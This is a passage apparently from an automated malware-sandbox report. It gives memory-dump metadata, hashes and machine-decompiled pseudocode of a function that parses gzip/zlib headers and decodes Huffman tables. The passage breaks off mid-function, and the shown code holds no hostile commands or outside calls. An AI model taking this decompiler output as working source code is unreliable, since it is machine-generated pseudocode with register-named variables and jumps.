                                                                                                                                                  0x00407eaf
                                                                                                                                                  0x00407eb2
                                                                                                                                                  0x00407eb5
                                                                                                                                                  0x00407eb9
                                                                                                                                                  0x00407ebd
                                                                                                                                                  0x00407f71
                                                                                                                                                  0x00407f7e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f84
                                                                                                                                                  0x00407f84
                                                                                                                                                  0x00407f89
                                                                                                                                                  0x00407f8b
                                                                                                                                                  0x00407f8b
                                                                                                                                                  0x00407f90
                                                                                                                                                  0x00407f90
                                                                                                                                                  0x00407f93
                                                                                                                                                  0x00407f97
                                                                                                                                                  0x00407f9c
                                                                                                                                                  0x00407f9f
                                                                                                                                                  0x00407f90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407f89
                                                                                                                                                  0x00407f7e
                                                                                                                                                  0x00407e6b
                                                                                                                                                  0x00407e6b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e70
                                                                                                                                                  0x00407e7e
                                                                                                                                                  0x00407e80
                                                                                                                                                  0x00407e84
                                                                                                                                                  0x00407e85
                                                                                                                                                  0x00407e88
                                                                                                                                                  0x00407e8d
                                                                                                                                                  0x00407e8e
                                                                                                                                                  0x00407e94
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e94
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e70
                                                                                                                                                  0x00407e69
                                                                                                                                                  0x00407dfd
                                                                                                                                                  0x00407dfd
                                                                                                                                                  0x00407e07
                                                                                                                                                  0x00407e36
                                                                                                                                                  0x00407e36
                                                                                                                                                  0x00407e3c
                                                                                                                                                  0x00407e3e
                                                                                                                                                  0x00407e45
                                                                                                                                                  0x00407e4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e10
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e10
                                                                                                                                                  0x00407e1e
                                                                                                                                                  0x00407e20
                                                                                                                                                  0x00407e21
                                                                                                                                                  0x00407e24
                                                                                                                                                  0x00407e25
                                                                                                                                                  0x00407e27
                                                                                                                                                  0x00407e2e
                                                                                                                                                  0x00407e34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407e10
                                                                                                                                                  0x00407e07
                                                                                                                                                  0x00407db5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407db5
                                                                                                                                                  0x00407dc3
                                                                                                                                                  0x00407dc8
                                                                                                                                                  0x00407dc9
                                                                                                                                                  0x00407dcc
                                                                                                                                                  0x00407dd8
                                                                                                                                                  0x00407dd9
                                                                                                                                                  0x00407de0
                                                                                                                                                  0x00407deb
                                                                                                                                                  0x00407df1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407df1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407db5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407fa6
                                                                                                                                                  0x00407fac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407d92
                                                                                                                                                  0x00407d8c
                                                                                                                                                  0x00407cc0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cc0
                                                                                                                                                  0x00407cc0
                                                                                                                                                  0x00407cc3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cc5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cc5
                                                                                                                                                  0x00407cd3
                                                                                                                                                  0x00407cd5
                                                                                                                                                  0x00407cd6
                                                                                                                                                  0x00407cd9
                                                                                                                                                  0x00407cda
                                                                                                                                                  0x00407cdc
                                                                                                                                                  0x00407ce3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ce3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cc5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ce5
                                                                                                                                                  0x00407cf5
                                                                                                                                                  0x00407cfa
                                                                                                                                                  0x00407d00
                                                                                                                                                  0x00407d03
                                                                                                                                                  0x00407d06
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cc0
                                                                                                                                                  0x00407cbb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c99

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                  • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                                                                                                  • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                  • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004073A0, Relevance: .6, Instructions: 633COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E004073A0() {
				signed char** _t638;
				signed int _t640;
				signed int _t641;
				unsigned int _t667;
				signed char* _t680;
				signed char* _t696;
				signed int* _t714;
				signed int _t716;
				signed char* _t723;
				void* _t730;

				_t638 =  *(_t730 + 4);
				if(_t638 == 0) {
					L330:
					return 0xfffffffe;
				} else {
					_t714 = _t638[7];
					if(_t714 == 0 || _t638[3] == 0 ||  *_t638 == 0 && _t638[1] != 0) {
						goto L330;
					} else {
						if( *_t714 == 0xb) {
							 *_t714 = 0xc;
						}
						_t696 = _t638[1];
						_t667 = _t714[0xe];
						_t723 =  *_t638;
						 *(_t730 + 0x20) = _t638[3];
						_t680 = _t638[4];
						_t640 =  *_t714;
						_t716 = _t714[0xf];
						 *(_t730 + 0x18) = _t680;
						 *(_t730 + 0x10) = _t696;
						 *(_t730 + 0x38) = _t696;
						 *(_t730 + 0x28) = _t680;
						 *(_t730 + 0x30) = 0;
						if(_t640 > 0x1c) {
							L305:
							_t641 = 0xfffffffe;
							goto L306;
						} else {
							do {
								switch( *((intOrPtr*)(_t640 * 4 +  &M004087C4))) {
									case 0:
										if(_t714[2] != 0) {
											if(_t716 >= 0x10) {
												L16:
												if((_t714[2] & 0x00000002) == 0 || _t667 != 0x8b1f) {
													_t642 = _t714[8];
													_t714[4] = 0;
													if(_t642 != 0) {
														 *((intOrPtr*)(_t642 + 0x30)) = 0xffffffff;
													}
													if((_t714[2] & 0x00000001) == 0 || (((_t667 & 0x000000ff) << 8) + (_t667 >> 8)) % 0x1f != 0) {
														( *(_t730 + 0x40))[6] = 0x41d338;
														goto L303;
													} else {
														if((_t667 & 0x0000000f) == 8) {
															_t667 = _t667 >> 4;
															_t693 = (_t667 & 0x0000000f) + 8;
															_t716 = _t716 - 4;
															if(_t693 <= _t714[9]) {
																_push(0);
																_push(0);
																_push(0);
																_t714[5] = 1 << _t693;
																_t647 = E004024A0();
																_t705 =  *(_t730 + 0x1c);
																_t714[6] = _t647;
																 *( *((intOrPtr*)(_t730 + 0x4c)) + 0x30) = _t647;
																 *_t714 =  !(_t667 >> 8) & 0x00000002 | 0x00000009;
																_t730 = _t730 + 0xc;
																_t667 = 0;
																_t716 = 0;
															} else {
																_t705 =  *(_t730 + 0x10);
																goto L302;
															}
														} else {
															_t705 =  *(_t730 + 0x10);
															( *(_t730 + 0x40))[6] = 0x41d338;
															goto L303;
														}
													}
												} else {
													_t714[6] = E00403080(0, 0, 0);
													 *((char*)(_t730 + 0x2c)) = 0x1f;
													 *((char*)(_t730 + 0x2d)) = 0x8b;
													_t650 = E00403080(_t714[6], _t730 + 0x2c, 2);
													_t705 =  *(_t730 + 0x28);
													_t730 = _t730 + 0x18;
													_t667 = 0;
													_t714[6] = _t650;
													_t716 = 0;
													 *_t714 = 1;
												}
												goto L304;
											} else {
												while(_t705 != 0) {
													_t665 = ( *_t723 & 0x000000ff) << _t716;
													_t705 = _t705 - 1;
													_t716 = _t716 + 8;
													_t723 =  &(_t723[1]);
													_t667 = _t667 + _t665;
													 *(_t730 + 0x10) = _t705;
													if(_t716 < 0x10) {
														continue;
													} else {
														goto L16;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											 *_t714 = 0xc;
											goto L304;
										}
										goto L331;
									case 1:
										if(__esi >= 0x10) {
											L32:
											 *(__edi + 0x10) = __ebx;
											if(__bl != 8) {
												goto L302;
											} else {
												if((__ebx & 0x0000e000) == 0) {
													__eax =  *(__edi + 0x20);
													if(__eax != 0) {
														__ebx = __ebx >> 8;
														__ecx = __ebx >> 0x00000008 & 0x00000001;
														 *__eax = __ebx >> 0x00000008 & 0x00000001;
													}
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __bl;
														__ebx = __ebx >> 8;
														__edx = __esp + 0x20;
														 *(__esp + 0x21) = __bl;
														__eax =  *(__edi + 0x18);
														__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
														__edx =  *(__esp + 0x1c);
														 *(__edi + 0x18) = __eax;
													}
													__ebx = 0;
													__esi = 0;
													 *__edi = 2;
													goto L42;
												} else {
													goto L34;
												}
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L32;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 2:
										if(__esi >= 0x20) {
											L44:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 4) = __ebx;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ecx = __ebx;
												__edx = __ebx;
												__ecx = __ebx >> 8;
												__edx = __ebx >> 0x10;
												__ebx = __ebx >> 0x18;
												__eax = __esp + 0x20;
												 *(__esp + 0x21) = __cl;
												 *((char*)(__esp + 0x22)) = __dl;
												 *(__esp + 0x23) = __bl;
												__ecx =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 3;
											goto L51;
										} else {
											L42:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L44;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 3:
										if(__esi >= 0x10) {
											L53:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												__ebx = __ebx & 0x000000ff;
												 *(__eax + 8) = __ebx & 0x000000ff;
												__ecx =  *(__edi + 0x20);
												__eax = __ebx;
												__eax = __ebx >> 8;
												 *( *(__edi + 0x20) + 0xc) = __eax;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ebx = __ebx >> 8;
												__edx = __esp + 0x20;
												 *(__esp + 0x21) = __bl;
												__eax =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 4;
											goto L58;
										} else {
											L51:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L53;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 4:
										L58:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L69;
										} else {
											if(__esi >= 0x10) {
												L62:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __ebx;
												if(__eax != 0) {
													 *(__eax + 0x14) = __ebx;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __bl;
													__ebx = __ebx >> 8;
													__ecx = __esp + 0x20;
													 *(__esp + 0x21) = __bl;
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__ebx = 0;
												__esi = 0;
												L69:
												 *__edi = 5;
												goto L70;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L62;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 5:
										L70:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L83:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L84;
										} else {
											__eax =  *(__edi + 0x40);
											 *(__esp + 0x14) = __eax;
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											if(__eax != 0) {
												__ecx =  *(__edi + 0x20);
												if(__ecx != 0) {
													__ecx =  *(__ecx + 0x10);
													 *(__esp + 0x34) = __ecx;
													if(__ecx != 0) {
														 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
														__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edi + 0x20);
														__edx =  *( *(__edi + 0x20) + 0x18);
														 *(__esp + 0x20) = __ecx;
														if(__ecx > __edx) {
															__eax = __edx;
														}
														__edx =  *(__esp + 0x34);
														__eax =  *(__esp + 0x24);
														__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
														__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
														__eax =  *(__esp + 0x20);
														__edx =  *(__esp + 0x1c);
													}
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x20);
												}
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												 *(__esp + 0x10) = __edx;
											}
											if( *(__edi + 0x40) != 0) {
												goto L312;
											} else {
												goto L83;
											}
										}
										goto L331;
									case 6:
										L84:
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L99;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x1c);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L99:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L100;
												}
											}
										}
										goto L331;
									case 7:
										L100:
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L115;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x24);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L115:
													 *__edi = 8;
													goto L116;
												}
											}
										}
										goto L331;
									case 8:
										L116:
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L123:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__edx =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											__eax = E00403080(0, 0, 0);
											__ecx =  *(__esp + 0x4c);
											__edx =  *(__esp + 0x1c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											 *__edi = 0xb;
											goto L304;
										} else {
											if(__esi >= 0x10) {
												L120:
												__ecx =  *(__edi + 0x18) & 0x0000ffff;
												if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
													__ebx = 0;
													__esi = 0;
													goto L123;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L120;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 9:
										if(__esi >= 0x20) {
											L130:
											__ebx = __ebx & 0x0000ff00;
											__ebx = __ebx << 0x10;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
											__ebx = __ebx >> 8;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
											__eax = __ebx >> 0x00000008 & 0x0000ff00;
											__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
											__eax = __ecx + __ebx;
											__ecx =  *(__esp + 0x40);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x40) + 0x30) = __eax;
											__ebx = 0;
											__esi = 0;
											 *__edi = 0xa;
											goto L131;
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L130;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xa:
										L131:
										if( *((intOrPtr*)(__edi + 0xc)) == 0) {
											__eax =  *(__esp + 0x40);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x18);
											 *__eax = __ebp;
											 *(__eax + 0x10) =  *(__esp + 0x18);
											 *(__eax + 4) = __edx;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											 *(__edi + 0x38) = __ebx;
											_pop(__ebx);
											__eax = 2;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E004024A0();
											__edx =  *(__esp + 0x4c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											__edx =  *(__esp + 0x1c);
											__esp = __esp + 0xc;
											 *__edi = 0xb;
											goto L133;
										}
										goto L331;
									case 0xb:
										L133:
										if( *((intOrPtr*)(__esp + 0x44)) == 5) {
											goto L312;
										} else {
											goto L134;
										}
										goto L331;
									case 0xc:
										L134:
										if( *(__edi + 4) == 0) {
											if(__esi >= 3) {
												L140:
												__ecx = __ebx;
												__ebx = __ebx >> 1;
												__eax = __ebx;
												__ecx = __ecx & 0x00000001;
												__eax = __ebx & 0x00000003;
												__esi = __esi - 1;
												 *(__edi + 4) = __ecx;
												if(__eax > 3) {
													L146:
													__ebx = __ebx >> 2;
													__esi = __esi - 2;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
														case 0:
															__ebx = __ebx >> 2;
															 *__edi = 0xd;
															__esi = __esi - 2;
															goto L304;
														case 1:
															__eax = __edi;
															__eax = E00407290(__edi);
															__ebx = __ebx >> 2;
															 *__edi = 0x12;
															__esi = __esi - 2;
															goto L304;
														case 2:
															__ebx = __ebx >> 2;
															 *__edi = 0xf;
															__esi = __esi - 2;
															goto L304;
														case 3:
															__eax =  *(__esp + 0x40);
															 *(__eax + 0x18) = 0x41d338;
															 *__edi = 0x1b;
															goto L146;
													}
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 3) {
														continue;
													} else {
														goto L140;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__esi = __esi & 0x00000007;
											__ebx = __ebx >> __cl;
											__esi = __esi - (__esi & 0x00000007);
											 *__edi = 0x18;
											goto L304;
										}
										goto L331;
									case 0xd:
										__esi = __esi & 0x00000007;
										__esi = __esi - (__esi & 0x00000007);
										__ebx = __ebx >> __cl;
										if(__esi >= 0x20) {
											L150:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx =  !__ebx;
											__eax = __ebx & 0x0000ffff;
											__ecx =  !__ebx >> 0x10;
											if(__eax ==  !__ebx >> 0x10) {
												__ebx = 0;
												 *(__edi + 0x40) = __eax;
												__esi = 0;
												 *__edi = 0xe;
												goto L153;
											} else {
												__eax =  *(__esp + 0x40);
												 *(__eax + 0x18) = 0x41d338;
												goto L303;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L150;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xe:
										L153:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x14) = __eax;
										if(__eax == 0) {
											goto L233;
										} else {
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											__ecx =  *(__esp + 0x18);
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x14) = __eax;
											}
											if(__eax == 0) {
												goto L312;
											} else {
												__ecx =  *(__esp + 0x14);
												__edx =  *(__esp + 0x24);
												__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
												__eax =  *(__esp + 0x20);
												 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
												 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
												__edx =  *(__esp + 0x1c);
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												goto L304;
											}
										}
										goto L331;
									case 0xf:
										if(__esi >= 0xe) {
											L163:
											__ecx = __ebx;
											__ecx = __ebx & 0x0000001f;
											__ebx = __ebx >> 5;
											__ecx = __ecx + 0x101;
											__eax = __ebx;
											 *(__edi + 0x60) = __ecx;
											__ebx = __ebx >> 5;
											__ecx = __ebx;
											__eax = __eax & 0x0000001f;
											__ecx = __ebx & 0x0000000f;
											__eax = __eax + 1;
											__ecx = (__ebx & 0x0000000f) + 4;
											__ebx = __ebx >> 4;
											__esi = __esi - 0xe;
											 *(__edi + 0x64) = __eax;
											 *(__edi + 0x5c) = __ecx;
											if( *(__edi + 0x60) > 0x11e || __eax > 0x1e) {
												goto L34;
											} else {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x10;
												goto L166;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0xe) {
													continue;
												} else {
													goto L163;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0x10:
										L166:
										__ecx =  *(__edi + 0x68);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L172:
											__eax = 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__edx =  *(__edi + 0x68);
												__ecx =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__edx = 0;
												 *((short*)(__edi + 0x70 + ( *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __dx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
											}
											__eax = __edi + 0x530;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x6c) = __eax;
											 *(__edi + 0x4c) = __eax;
											__edx = __edi + 0x2f0;
											__eax = __edi + 0x54;
											 *(__edi + 0x54) = 7;
											__eax = __edi + 0x70;
											__eax = E00408C60(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x70, __edi + 0x2f0);
											__edx =  *(__esp + 0x28);
											 *(__esp + 0x30) = __eax;
											if(__eax != 0) {
												goto L302;
											} else {
												 *(__edi + 0x68) = __eax;
												 *__edi = 0x11;
												goto L177;
											}
										} else {
											do {
												if(__esi >= 3) {
													goto L171;
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebp =  &(__ebp[1]);
														__ebx = __ebx + __eax;
														 *(__esp + 0x10) = __edx;
														if(__esi < 3) {
															continue;
														} else {
															goto L171;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L171:
												__eax =  *(__edi + 0x68);
												__eax =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__ebx = __ebx & 0x00000007;
												 *((short*)(__edi + 0x70 + __eax * 2)) = __cx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
